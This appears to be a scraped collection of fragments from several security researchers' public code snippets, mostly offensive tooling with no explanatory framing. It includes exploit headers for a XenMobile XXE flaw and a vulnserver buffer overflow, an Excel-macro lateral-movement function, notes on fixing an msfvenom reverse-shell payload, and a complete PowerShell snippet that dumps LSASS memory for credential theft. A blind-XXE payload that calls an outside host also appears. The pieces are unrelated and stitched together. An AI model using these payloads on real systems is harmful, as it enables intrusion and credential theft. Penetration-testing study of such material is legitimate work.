jonaslejon

#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys

r00tpgp

#!/usr/bin/python
# vulnserver.exe GTER BoF using egghunter by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
# final evil payload is sent after few seconds delay to enable egghunter to locate it 
#
import socket
import os
import sys
import time

PaulSec

0x00sec.org
10.32.59.31:32204
10.45.35.173:7990
1122qq.weebly.com
123movies.co
123moviesfull.co
123movies.re
1337x.io
141jav.com
1592878.com

coffeegist

if [ "$#" -ne 3 ]; then
	echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
	exit 1
fi

nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2

enigma0x3

function Invoke-ExcelMacroPivot{
<#
    .AUTHOR
       Matt Nelson (@enigma0x3)
    .SYNOPSIS
       Pivots to a remote host by using an Excel macro and Excel's COM object
    .PARAMETER Target
        Remote host to pivot to
    .PARAMETER RemoteDocumentPath
        Local path on the remote host where the payload resides

decidedlygray

Quick Reference

This section is a boiled down version of everything above. It should serve as an easy reference. These steps assume you've identified and installed the correct JDK.

Modify and Re-Jar Extension

1. Locate the jar file: Extender > Extensions > Select extension > Details. bapps\ directory is located at C:\Users\yourusername\AppData\Roaming\BurpSuite\bapps
2. Backup the original jar file to a different folder, outside of bapps.
3. Change extension from .jar to .zip, extract contents, delete .zip file
4. Make your modifications
5. Re-jar: jar cvf yourJarName.jar -C extractedContentsDirectory/ .

v0s

** Если нет 1.5 часов, можно пропустить dist-upgrade, === Advanced === и disk shrink. Сэкономит полчаса
Подробная установка: https://youtu.be/nZ3mDnpZeic


https://kali.download/base-images/*/*-installer-amd64.iso.torrent

/etc/network/interfaces - change interface to eth0
static
    address 192.168.192.64
    netmask 255.255.255.0

mgeeky

Looking for WaitForSingleObject call within modern msfvenom generated payload.

---

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

natesubra

$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>